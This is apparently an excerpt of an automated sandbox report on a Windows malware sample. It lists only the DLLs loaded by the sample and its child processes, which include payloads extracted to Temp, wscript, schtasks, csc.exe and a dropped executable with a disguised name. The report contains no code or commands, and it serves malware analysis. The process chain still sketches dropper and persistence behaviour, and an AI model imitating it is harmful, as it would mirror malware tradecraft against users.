                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: iconcodecservice.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeSection loaded: vcruntime140_clr0400.dll
